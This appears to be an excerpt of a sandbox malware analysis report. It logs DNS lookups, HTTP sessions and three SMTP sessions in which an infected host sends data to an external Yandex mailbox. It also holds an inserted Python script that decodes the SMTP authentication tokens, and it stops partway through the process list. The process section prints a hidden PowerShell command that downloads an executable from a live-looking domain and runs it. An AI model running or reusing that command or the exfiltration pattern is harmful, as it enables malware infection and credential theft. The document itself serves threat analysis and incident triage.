Sep 27, 2024 10:39:52.339257002 CEST  60913    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:52.339281082 CEST  60913    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:52.339313030 CEST  60913    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:52.339349031 CEST  60913    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:52.339375973 CEST  60913    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:52.339401007 CEST  60913    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:52.339423895 CEST  60913    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:52.339445114 CEST  60913    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:52.339463949 CEST  60913    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:52.344127893 CEST    587  60913  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:52.344288111 CEST    587  60913  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:52.344558001 CEST    587  60913  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:52.499825954 CEST    587  60913  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:52.540688038 CEST  60913    587  192.168.2.6      208.91.198.176
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 27, 2024 10:39:05.030292988 CEST | 53 | 62815 | 1.1.1.1 | 192.168.2.6
Sep 27, 2024 10:39:10.812020063 CEST | 53715 | 53 | 192.168.2.6 | 1.1.1.1
Sep 27, 2024 10:39:11.079967976 CEST | 53 | 53715 | 1.1.1.1 | 192.168.2.6
Sep 27, 2024 10:39:28.306246996 CEST | 50273 | 53 | 192.168.2.6 | 1.1.1.1
Sep 27, 2024 10:39:28.313357115 CEST | 53 | 50273 | 1.1.1.1 | 192.168.2.6
Sep 27, 2024 10:39:29.701720953 CEST | 64177 | 53 | 192.168.2.6 | 1.1.1.1
Sep 27, 2024 10:39:29.708399057 CEST | 53 | 64177 | 1.1.1.1 | 192.168.2.6
Sep 27, 2024 10:39:30.854154110 CEST | 60318 | 53 | 192.168.2.6 | 1.1.1.1
Sep 27, 2024 10:39:31.170962095 CEST | 53 | 60318 | 1.1.1.1 | 192.168.2.6
Sep 27, 2024 10:39:32.814682961 CEST | 53 | 55497 | 162.159.36.2 | 192.168.2.6
Sep 27, 2024 10:39:33.268306971 CEST | 59244 | 53 | 192.168.2.6 | 1.1.1.1
Sep 27, 2024 10:39:33.275362015 CEST | 53 | 59244 | 1.1.1.1 | 192.168.2.6
Sep 27, 2024 10:39:45.745012045 CEST | 50119 | 53 | 192.168.2.6 | 1.1.1.1
Sep 27, 2024 10:39:45.751518011 CEST | 53 | 50119 | 1.1.1.1 | 192.168.2.6
Sep 27, 2024 10:39:46.390655041 CEST | 52756 | 53 | 192.168.2.6 | 1.1.1.1
Sep 27, 2024 10:39:46.397241116 CEST | 53 | 52756 | 1.1.1.1 | 192.168.2.6
Sep 27, 2024 10:39:47.453769922 CEST | 56561 | 53 | 192.168.2.6 | 1.1.1.1
Sep 27, 2024 10:39:47.905328989 CEST | 53 | 56561 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 27, 2024 10:39:10.812020063 CEST | 192.168.2.6 | 1.1.1.1 | 0x5ff | Standard query (0) | oootorgline.ru | A (IP address) | IN (0x0001) | false
Sep 27, 2024 10:39:28.306246996 CEST | 192.168.2.6 | 1.1.1.1 | 0xb555 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Sep 27, 2024 10:39:29.701720953 CEST | 192.168.2.6 | 1.1.1.1 | 0x41be | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Sep 27, 2024 10:39:30.854154110 CEST | 192.168.2.6 | 1.1.1.1 | 0x7ea4 | Standard query (0) | techniqueqatar.com | A (IP address) | IN (0x0001) | false
Sep 27, 2024 10:39:33.268306971 CEST | 192.168.2.6 | 1.1.1.1 | 0xb415 | Standard query (0) | 171.39.242.20.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Sep 27, 2024 10:39:45.745012045 CEST | 192.168.2.6 | 1.1.1.1 | 0x55f1 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Sep 27, 2024 10:39:46.390655041 CEST | 192.168.2.6 | 1.1.1.1 | 0x777f | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Sep 27, 2024 10:39:47.453769922 CEST | 192.168.2.6 | 1.1.1.1 | 0x2d1 | Standard query (0) | techniqueqatar.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Sep 27, 2024 10:39:11.079967976 CEST | 1.1.1.1 | 192.168.2.6 | 0x5ff | No error (0) | oootorgline.ru | | 176.99.3.36 | A (IP address) | IN (0x0001) | false
Sep 27, 2024 10:39:28.313357115 CEST | 1.1.1.1 | 192.168.2.6 | 0xb555 | No error (0) | api.ipify.org | | 172.67.74.152 | A (IP address) | IN (0x0001) | false
Sep 27, 2024 10:39:28.313357115 CEST | 1.1.1.1 | 192.168.2.6 | 0xb555 | No error (0) | api.ipify.org | | 104.26.12.205 | A (IP address) | IN (0x0001) | false
Sep 27, 2024 10:39:28.313357115 CEST | 1.1.1.1 | 192.168.2.6 | 0xb555 | No error (0) | api.ipify.org | | 104.26.13.205 | A (IP address) | IN (0x0001) | false
Sep 27, 2024 10:39:29.708399057 CEST | 1.1.1.1 | 192.168.2.6 | 0x41be | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Sep 27, 2024 10:39:31.170962095 CEST | 1.1.1.1 | 192.168.2.6 | 0x7ea4 | No error (0) | techniqueqatar.com | | 208.91.198.176 | A (IP address) | IN (0x0001) | false
Sep 27, 2024 10:39:33.275362015 CEST | 1.1.1.1 | 192.168.2.6 | 0xb415 | Name error (3) | 171.39.242.20.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
Sep 27, 2024 10:39:45.751518011 CEST | 1.1.1.1 | 192.168.2.6 | 0x55f1 | No error (0) | api.ipify.org | | 104.26.13.205 | A (IP address) | IN (0x0001) | false
Sep 27, 2024 10:39:45.751518011 CEST | 1.1.1.1 | 192.168.2.6 | 0x55f1 | No error (0) | api.ipify.org | | 172.67.74.152 | A (IP address) | IN (0x0001) | false
Sep 27, 2024 10:39:45.751518011 CEST | 1.1.1.1 | 192.168.2.6 | 0x55f1 | No error (0) | api.ipify.org | | 104.26.12.205 | A (IP address) | IN (0x0001) | false
Sep 27, 2024 10:39:46.397241116 CEST | 1.1.1.1 | 192.168.2.6 | 0x777f | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Sep 27, 2024 10:39:47.905328989 CEST | 1.1.1.1 | 192.168.2.6 | 0x2d1 | No error (0) | techniqueqatar.com | | 208.91.198.176 | A (IP address) | IN (0x0001) | false
• oootorgline.ru
• api.ipify.org
• ip-api.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 61254 | 208.95.112.1 | 80 | 4412 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 10:39:29.714550018 CEST | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
Sep 27, 2024 10:39:30.175986052 CEST | 175 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Sep 2024 08:39:29 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 6
Access-Control-Allow-Origin: *
X-Ttl: 45
X-Rl: 43
Data Raw: 66 61 6c 73 65 0a
Data Ascii: false


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 60911 | 208.95.112.1 | 80 | 5768 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 10:39:46.402874947 CEST | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
Sep 27, 2024 10:39:46.875243902 CEST | 175 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Sep 2024 08:39:46 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 6
Access-Control-Allow-Origin: *
X-Ttl: 28
X-Rl: 42
Data Raw: 66 61 6c 73 65 0a
Data Ascii: false


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 61245 | 176.99.3.36 | 443 | 1824 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 08:39:12 UTC | 179 | OUT | GET /components/grace.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: oootorgline.ru
Connection: Keep-Alive
2024-09-27 08:39:12 UTC | 306 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.2
Date: Fri, 27 Sep 2024 08:39:12 GMT
Content-Type: application/octet-stream
Content-Length: 1305263
Connection: close
Last-Modified: Fri, 27 Sep 2024 01:23:14 GMT
ETag: "13eaaf-6230fb2f7c813"
Accept-Ranges: bytes
Strict-Transport-Security: max-age=31536000;


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 61253 | 172.67.74.152 | 443 | 4412 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 08:39:29 UTC | 155 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Host: api.ipify.org
Connection: Keep-Alive
2024-09-27 08:39:29 UTC | 211 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Sep 2024 08:39:29 GMT
Content-Type: text/plain
Content-Length: 11
Connection: close
Vary: Origin
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 8c9a2ef98a1442d5-EWR
2024-09-27 08:39:29 UTC | 11 | IN | Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
Data Ascii: 8.46.123.33


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 60910 | 104.26.13.205 | 443 | 5768 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 08:39:46 UTC | 155 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Host: api.ipify.org
Connection: Keep-Alive
2024-09-27 08:39:46 UTC | 211 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Sep 2024 08:39:46 GMT
Content-Type: text/plain
Content-Length: 11
Connection: close
Vary: Origin
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 8c9a2f62892443cd-EWR
2024-09-27 08:39:46 UTC | 11 | IN | Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
Data Ascii: 8.46.123.33


Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Sep 27, 2024 10:39:31.863718033 CEST | 587 | 61255 | 208.91.198.176 | 192.168.2.6 | 220 PLESK-WEB15.webhostbox.net ESMTP MailEnable Service, Version: 10.43-10.43- ready at 09/27/24 08:39:31
Sep 27, 2024 10:39:31.869550943 CEST | 61255 | 587 | 192.168.2.6 | 208.91.198.176 | EHLO 855271
Sep 27, 2024 10:39:32.028579950 CEST | 587 | 61255 | 208.91.198.176 | 192.168.2.6 | 250-PLESK-WEB15.webhostbox.net [8.46.123.33], this server offers 5 extensions
250-AUTH NTLM CRAM-MD5 LOGIN
250-SIZE 31457280
250-HELP
250-AUTH=LOGIN
250 STARTTLS
Sep 27, 2024 10:39:32.049669981 CEST | 61255 | 587 | 192.168.2.6 | 208.91.198.176 | AUTH ntlm TlRMTVNTUAABAAAAB4IIogAAAAAAAAAAAAAAAAAAAAAKAGFKAAAADw==
Sep 27, 2024 10:39:32.205918074 CEST | 587 | 61255 | 208.91.198.176 | 192.168.2.6 | 334 TlRMTVNTUAACAAAAFAAUACAAAAAFAgAAASNFZ4mrze9NAGEAaQBsAEUAbgBhAGIAbABlAA==
Sep 27, 2024 10:39:32.371865988 CEST | 587 | 61255 | 208.91.198.176 | 192.168.2.6 | 535 Invalid Username or Password
Sep 27, 2024 10:39:32.372162104 CEST | 61255 | 587 | 192.168.2.6 | 208.91.198.176 | AUTH login aW5mb0B0ZWNobmlxdWVxYXRhci5jb20=
Sep 27, 2024 10:39:32.529844046 CEST | 587 | 61255 | 208.91.198.176 | 192.168.2.6 | 334 UGFzc3dvcmQ6
Sep 27, 2024 10:39:32.692858934 CEST | 587 | 61255 | 208.91.198.176 | 192.168.2.6 | 235 Authenticated
Sep 27, 2024 10:39:32.693131924 CEST | 61255 | 587 | 192.168.2.6 | 208.91.198.176 | MAIL FROM:<info@techniqueqatar.com>
Sep 27, 2024 10:39:32.853941917 CEST | 587 | 61255 | 208.91.198.176 | 192.168.2.6 | 250 Requested mail action okay, completed
Sep 27, 2024 10:39:32.854136944 CEST | 61255 | 587 | 192.168.2.6 | 208.91.198.176 | RCPT TO:<obamueze20@yandex.com>
Sep 27, 2024 10:39:33.014722109 CEST | 587 | 61255 | 208.91.198.176 | 192.168.2.6 | 250 Requested mail action okay, completed
Sep 27, 2024 10:39:33.014929056 CEST | 61255 | 587 | 192.168.2.6 | 208.91.198.176 | DATA
Sep 27, 2024 10:39:33.191643000 CEST | 587 | 61255 | 208.91.198.176 | 192.168.2.6 | 354 Start mail input; end with <CRLF>.<CRLF>
Sep 27, 2024 10:39:33.192322016 CEST | 61255 | 587 | 192.168.2.6 | 208.91.198.176 | .
Sep 27, 2024 10:39:33.468732119 CEST | 587 | 61255 | 208.91.198.176 | 192.168.2.6 | 250 Requested mail action okay, completed
Sep 27, 2024 10:39:33.527435064 CEST | 61255 | 587 | 192.168.2.6 | 208.91.198.176 | QUIT
Sep 27, 2024 10:39:33.684020042 CEST | 587 | 61255 | 208.91.198.176 | 192.168.2.6 | 221 Service closing transmission channel
Sep 27, 2024 10:39:34.285824060 CEST | 587 | 60905 | 208.91.198.176 | 192.168.2.6 | 220 PLESK-WEB15.webhostbox.net ESMTP MailEnable Service, Version: 10.43-10.43- ready at 09/27/24 08:39:34
Sep 27, 2024 10:39:34.288938999 CEST | 60905 | 587 | 192.168.2.6 | 208.91.198.176 | EHLO 855271
Sep 27, 2024 10:39:34.448801994 CEST | 587 | 60905 | 208.91.198.176 | 192.168.2.6 | 250-PLESK-WEB15.webhostbox.net [8.46.123.33], this server offers 5 extensions
250-AUTH NTLM CRAM-MD5 LOGIN
250-SIZE 31457280
250-HELP
250-AUTH=LOGIN
250 STARTTLS
Sep 27, 2024 10:39:34.480710030 CEST | 60905 | 587 | 192.168.2.6 | 208.91.198.176 | AUTH ntlm TlRMTVNTUAABAAAAB4IIogAAAAAAAAAAAAAAAAAAAAAKAGFKAAAADw==
Sep 27, 2024 10:39:34.639841080 CEST | 587 | 60905 | 208.91.198.176 | 192.168.2.6 | 334 TlRMTVNTUAACAAAAFAAUACAAAAAFAgAAASNFZ4mrze9NAGEAaQBsAEUAbgBhAGIAbABlAA==
Sep 27, 2024 10:39:34.815177917 CEST | 587 | 60905 | 208.91.198.176 | 192.168.2.6 | 535 Invalid Username or Password
Sep 27, 2024 10:39:34.815320969 CEST | 60905 | 587 | 192.168.2.6 | 208.91.198.176 | AUTH login aW5mb0B0ZWNobmlxdWVxYXRhci5jb20=
Sep 27, 2024 10:39:34.976739883 CEST | 587 | 60905 | 208.91.198.176 | 192.168.2.6 | 334 UGFzc3dvcmQ6
Sep 27, 2024 10:39:35.136542082 CEST | 587 | 60905 | 208.91.198.176 | 192.168.2.6 | 235 Authenticated
Sep 27, 2024 10:39:35.136774063 CEST | 60905 | 587 | 192.168.2.6 | 208.91.198.176 | MAIL FROM:<info@techniqueqatar.com>
Sep 27, 2024 10:39:35.297631025 CEST | 587 | 60905 | 208.91.198.176 | 192.168.2.6 | 250 Requested mail action okay, completed
Sep 27, 2024 10:39:35.297821045 CEST | 60905 | 587 | 192.168.2.6 | 208.91.198.176 | RCPT TO:<obamueze20@yandex.com>
Sep 27, 2024 10:39:35.460177898 CEST | 587 | 60905 | 208.91.198.176 | 192.168.2.6 | 250 Requested mail action okay, completed
Sep 27, 2024 10:39:35.460342884 CEST | 60905 | 587 | 192.168.2.6 | 208.91.198.176 | DATA
Sep 27, 2024 10:39:35.638395071 CEST | 587 | 60905 | 208.91.198.176 | 192.168.2.6 | 354 Start mail input; end with <CRLF>.<CRLF>
Sep 27, 2024 10:39:35.640088081 CEST | 60905 | 587 | 192.168.2.6 | 208.91.198.176 | .
Sep 27, 2024 10:39:36.055511951 CEST | 587 | 60905 | 208.91.198.176 | 192.168.2.6 | 250 Requested mail action okay, completed
Sep 27, 2024 10:39:48.495675087 CEST | 587 | 60912 | 208.91.198.176 | 192.168.2.6 | 220 PLESK-WEB15.webhostbox.net ESMTP MailEnable Service, Version: 10.43-10.43- ready at 09/27/24 08:39:48
Sep 27, 2024 10:39:48.495978117 CEST | 60912 | 587 | 192.168.2.6 | 208.91.198.176 | EHLO 855271
Sep 27, 2024 10:39:48.656013012 CEST | 587 | 60912 | 208.91.198.176 | 192.168.2.6 | 250-PLESK-WEB15.webhostbox.net [8.46.123.33], this server offers 5 extensions
                                                                      250-AUTH NTLM CRAM-MD5 LOGIN
                                                                      250-SIZE 31457280
                                                                      250-HELP
                                                                      250-AUTH=LOGIN
                                                                      250 STARTTLS
                                                                      Sep 27, 2024 10:39:48.659544945 CEST60912587192.168.2.6208.91.198.176AUTH ntlm TlRMTVNTUAABAAAAB4IIogAAAAAAAAAAAAAAAAAAAAAKAGFKAAAADw==
                                                                      Sep 27, 2024 10:39:48.820480108 CEST58760912208.91.198.176192.168.2.6334 TlRMTVNTUAACAAAAFAAUACAAAAAFAgAAASNFZ4mrze9NAGEAaQBsAEUAbgBhAGIAbABlAA==
                                                                      Sep 27, 2024 10:39:48.983197927 CEST58760912208.91.198.176192.168.2.6535 Invalid Username or Password
                                                                      Sep 27, 2024 10:39:48.983772993 CEST60912587192.168.2.6208.91.198.176AUTH login aW5mb0B0ZWNobmlxdWVxYXRhci5jb20=
                                                                      Sep 27, 2024 10:39:49.212616920 CEST58760912208.91.198.176192.168.2.6334 UGFzc3dvcmQ6
                                                                      Sep 27, 2024 10:39:49.374878883 CEST58760912208.91.198.176192.168.2.6235 Authenticated
                                                                      Sep 27, 2024 10:39:49.375241995 CEST60912587192.168.2.6208.91.198.176MAIL FROM:<info@techniqueqatar.com>
                                                                      Sep 27, 2024 10:39:49.537868023 CEST58760912208.91.198.176192.168.2.6250 Requested mail action okay, completed
                                                                      Sep 27, 2024 10:39:49.538279057 CEST60912587192.168.2.6208.91.198.176RCPT TO:<obamueze20@yandex.com>
                                                                      Sep 27, 2024 10:39:49.868890047 CEST58760912208.91.198.176192.168.2.6250 Requested mail action okay, completed
                                                                      Sep 27, 2024 10:39:49.869097948 CEST60912587192.168.2.6208.91.198.176DATA
                                                                      Sep 27, 2024 10:39:50.049453020 CEST58760912208.91.198.176192.168.2.6354 Start mail input; end with <CRLF>.<CRLF>
                                                                      Sep 27, 2024 10:39:50.050106049 CEST60912587192.168.2.6208.91.198.176.
                                                                      Sep 27, 2024 10:39:50.316258907 CEST58760912208.91.198.176192.168.2.6250 Requested mail action okay, completed
                                                                      Sep 27, 2024 10:39:50.353040934 CEST60912587192.168.2.6208.91.198.176QUIT
                                                                      Sep 27, 2024 10:39:50.514698029 CEST58760912208.91.198.176192.168.2.6221 Service closing transmission channel
                                                                      Sep 27, 2024 10:39:51.066147089 CEST58760913208.91.198.176192.168.2.6220 PLESK-WEB15.webhostbox.net ESMTP MailEnable Service, Version: 10.43-10.43- ready at 09/27/24 08:39:50
                                                                      Sep 27, 2024 10:39:51.066314936 CEST60913587192.168.2.6208.91.198.176EHLO 855271
                                                                      Sep 27, 2024 10:39:51.221191883 CEST58760913208.91.198.176192.168.2.6250-PLESK-WEB15.webhostbox.net [8.46.123.33], this server offers 5 extensions
                                                                      250-AUTH NTLM CRAM-MD5 LOGIN
                                                                      250-SIZE 31457280
                                                                      250-HELP
                                                                      250-AUTH=LOGIN
                                                                      250 STARTTLS
                                                                      Sep 27, 2024 10:39:51.221904993 CEST60913587192.168.2.6208.91.198.176AUTH ntlm TlRMTVNTUAABAAAAB4IIogAAAAAAAAAAAAAAAAAAAAAKAGFKAAAADw==
                                                                      Sep 27, 2024 10:39:51.378034115 CEST58760913208.91.198.176192.168.2.6334 TlRMTVNTUAACAAAAFAAUACAAAAAFAgAAASNFZ4mrze9NAGEAaQBsAEUAbgBhAGIAbABlAA==
                                                                      Sep 27, 2024 10:39:51.535609007 CEST58760913208.91.198.176192.168.2.6535 Invalid Username or Password
                                                                      Sep 27, 2024 10:39:51.535824060 CEST60913587192.168.2.6208.91.198.176AUTH login aW5mb0B0ZWNobmlxdWVxYXRhci5jb20=
                                                                      Sep 27, 2024 10:39:51.690300941 CEST58760913208.91.198.176192.168.2.6334 UGFzc3dvcmQ6
                                                                      Sep 27, 2024 10:39:51.846152067 CEST58760913208.91.198.176192.168.2.6235 Authenticated
                                                                      Sep 27, 2024 10:39:51.851798058 CEST60913587192.168.2.6208.91.198.176MAIL FROM:<info@techniqueqatar.com>
                                                                      Sep 27, 2024 10:39:52.008380890 CEST58760913208.91.198.176192.168.2.6250 Requested mail action okay, completed
                                                                      Sep 27, 2024 10:39:52.008574009 CEST60913587192.168.2.6208.91.198.176RCPT TO:<obamueze20@yandex.com>
                                                                      Sep 27, 2024 10:39:52.164768934 CEST58760913208.91.198.176192.168.2.6250 Requested mail action okay, completed
                                                                      Sep 27, 2024 10:39:52.165067911 CEST60913587192.168.2.6208.91.198.176DATA
                                                                      Sep 27, 2024 10:39:52.337244987 CEST58760913208.91.198.176192.168.2.6354 Start mail input; end with <CRLF>.<CRLF>
                                                                      Sep 27, 2024 10:39:52.339463949 CEST60913587192.168.2.6208.91.198.176.
                                                                      Sep 27, 2024 10:39:52.499825954 CEST58760913208.91.198.176192.168.2.6250 Requested mail action okay, completed
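The three SMTP sessions above (client ports 60905, 60912 and 60913 to server port 587) repeat one pattern: EHLO, a rejected AUTH NTLM attempt, a successful AUTH LOGIN, and a message from info@techniqueqatar.com to obamueze20@yandex.com, all in plaintext on port 587 even though the server advertises STARTTLS. The following Python is an added example, not part of the Joe Sandbox report: it replays the first session from the dialogue transcribed above, decodes the base64 SASL tokens so the authenticated mailbox and the server's NTLM challenge parameters become readable, and emits the findings a responder would put in a triage note. The C:/S: direction prefixes, the function names and the result keys are this example's own notation; the report itself shows direction only by IP address and port, and shows neither the client's password response after the 334 prompt nor the message body, so neither appears in the transcript.

```python
"""Triage of the first SMTP exfiltration session captured above (client port 60905 -> 587).
Added example, not part of the Joe Sandbox report; the C:/S: direction prefixes are ours."""
import base64
import re
import struct

# Transcribed from the capture above. The report shows neither the client's base64
# password after the "334 Password:" prompt nor the DATA body, so neither appears here.
SESSION = """\
S: 220 PLESK-WEB15.webhostbox.net ESMTP MailEnable Service, Version: 10.43-10.43- ready at 09/27/24 08:39:34
C: EHLO 855271
S: 250-PLESK-WEB15.webhostbox.net [8.46.123.33], this server offers 5 extensions
S: 250-AUTH NTLM CRAM-MD5 LOGIN
S: 250-SIZE 31457280
S: 250-HELP
S: 250-AUTH=LOGIN
S: 250 STARTTLS
C: AUTH ntlm TlRMTVNTUAABAAAAB4IIogAAAAAAAAAAAAAAAAAAAAAKAGFKAAAADw==
S: 334 TlRMTVNTUAACAAAAFAAUACAAAAAFAgAAASNFZ4mrze9NAGEAaQBsAEUAbgBhAGIAbABlAA==
S: 535 Invalid Username or Password
C: AUTH login aW5mb0B0ZWNobmlxdWVxYXRhci5jb20=
S: 334 UGFzc3dvcmQ6
S: 235 Authenticated
C: MAIL FROM:<info@techniqueqatar.com>
S: 250 Requested mail action okay, completed
C: RCPT TO:<obamueze20@yandex.com>
S: 250 Requested mail action okay, completed
C: DATA
S: 354 Start mail input; end with <CRLF>.<CRLF>
C: .
S: 250 Requested mail action okay, completed
"""

def b64_bytes(token):
    """Strictly decode one base64 SASL token; None if it is not base64."""
    try:
        return base64.b64decode(token, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None

def parse_ntlm_type2(blob):
    """Target name and server challenge from an NTLM CHALLENGE_MESSAGE (type 2)."""
    if blob is None or len(blob) < 32 or blob[:8] != b"NTLMSSP\x00":
        return None
    msg_type, name_len, _, name_off, flags = struct.unpack_from("<IHHII", blob, 8)
    if msg_type != 2:
        return None
    # NTLMSSP_NEGOTIATE_UNICODE (bit 0) means the target name is UTF-16LE.
    target = blob[name_off:name_off + name_len].decode("utf-16-le" if flags & 1 else "latin-1", "replace")
    return {"target": target, "challenge": blob[24:32].hex(), "flags": flags}

def triage_session(text):
    """Walk the dialogue in order and collect the exfiltration indicators."""
    r = {"starttls_offered": False, "starttls_used": False, "cleartext_auth": False,
         "auth_login_user": None, "ntlm": None, "authenticated": False, "mail_from": None, "rcpt_to": []}
    for raw in text.splitlines():
        side, _, line = raw.partition(": ")
        if side == "C":
            verb = line.split(" ", 1)[0].upper()
            if verb == "STARTTLS":
                r["starttls_used"] = True
            elif verb == "AUTH":
                # AUTH issued before STARTTLS: the credential exchange crosses the wire in cleartext.
                r["cleartext_auth"] = not r["starttls_used"]
                parts = line.split(" ", 2)
                if len(parts) > 2 and parts[1].upper() == "LOGIN":
                    blob = b64_bytes(parts[2])  # AUTH LOGIN initial response is the username
                    r["auth_login_user"] = blob.decode("utf-8", "replace") if blob else None
            elif verb in ("MAIL", "RCPT"):
                addr = re.search(r"<([^>]*)>", line)
                if addr and verb == "MAIL":
                    r["mail_from"] = addr.group(1)
                elif addr:
                    r["rcpt_to"].append(addr.group(1))
        elif side == "S":
            code, rest = line[:3], line[4:]
            if code == "250" and rest.upper() == "STARTTLS":  # capability line of the EHLO reply
                r["starttls_offered"] = True
            elif code == "334":  # SASL challenge: an NTLM type 2 blob, or the base64 LOGIN "Password:" prompt
                r["ntlm"] = parse_ntlm_type2(b64_bytes(rest)) or r["ntlm"]
            elif code == "235":
                r["authenticated"] = True
    return r

def findings(r):
    """One line per indicator, for the triage note."""
    out = []
    if r["cleartext_auth"]:
        tls = "offers" if r["starttls_offered"] else "does not offer"
        out.append("AUTH before STARTTLS (server %s it): credential sent in cleartext" % tls)
    if r["auth_login_user"]:
        out.append("AUTH LOGIN account: " + r["auth_login_user"])
    if r["ntlm"]:
        out.append("NTLM challenge from %r: %s" % (r["ntlm"]["target"], r["ntlm"]["challenge"]))
    if r["authenticated"] and r["mail_from"]:
        out.append("mail accepted from %s to %s" % (r["mail_from"], ", ".join(r["rcpt_to"])))
    return out
```

Running `findings(triage_session(SESSION))` shows that the AUTH LOGIN username decodes to the same mailbox as MAIL FROM, that the server's 334 prompt is the base64 of "Password:", and that the NTLM type 2 blob names the target "MailEnable". Because the client never issued STARTTLS, everything the sandbox captured here, including the password response the report omits, was visible to anyone on the path; that is also why the capture could be logged at all. The same parser applies unchanged to the 60912 and 60913 sessions.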


                                                                      Target ID:0
                                                                      Start time:04:38:58
                                                                      Start date:27/09/2024
                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://oootorgline.ru/components/grace.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }"
                                                                      Imagebase:0x7ff6e3d50000
                                                                      File size:452'608 bytes
                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:2
                                                                      Start time:04:38:59
                                                                      Start date:27/09/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff66e660000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:3
                                                                      Start time:04:39:14
                                                                      Start date:27/09/2024
                                                                      Path:C:\Users\user\AppData\Local\Temp\file.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\file.exe"
                                                                      Imagebase:0x400000
                                                                      File size:1'305'263 bytes
                                                                      MD5 hash:AA6F514A7AFA81E26BCF612923EA483C
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:7
                                                                      Start time:04:39:21
                                                                      Start date:27/09/2024
                                                                      Path:C:\Users\user\AppData\Local\unspattered\recomplaint.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\file.exe"
                                                                      Imagebase:0x400000
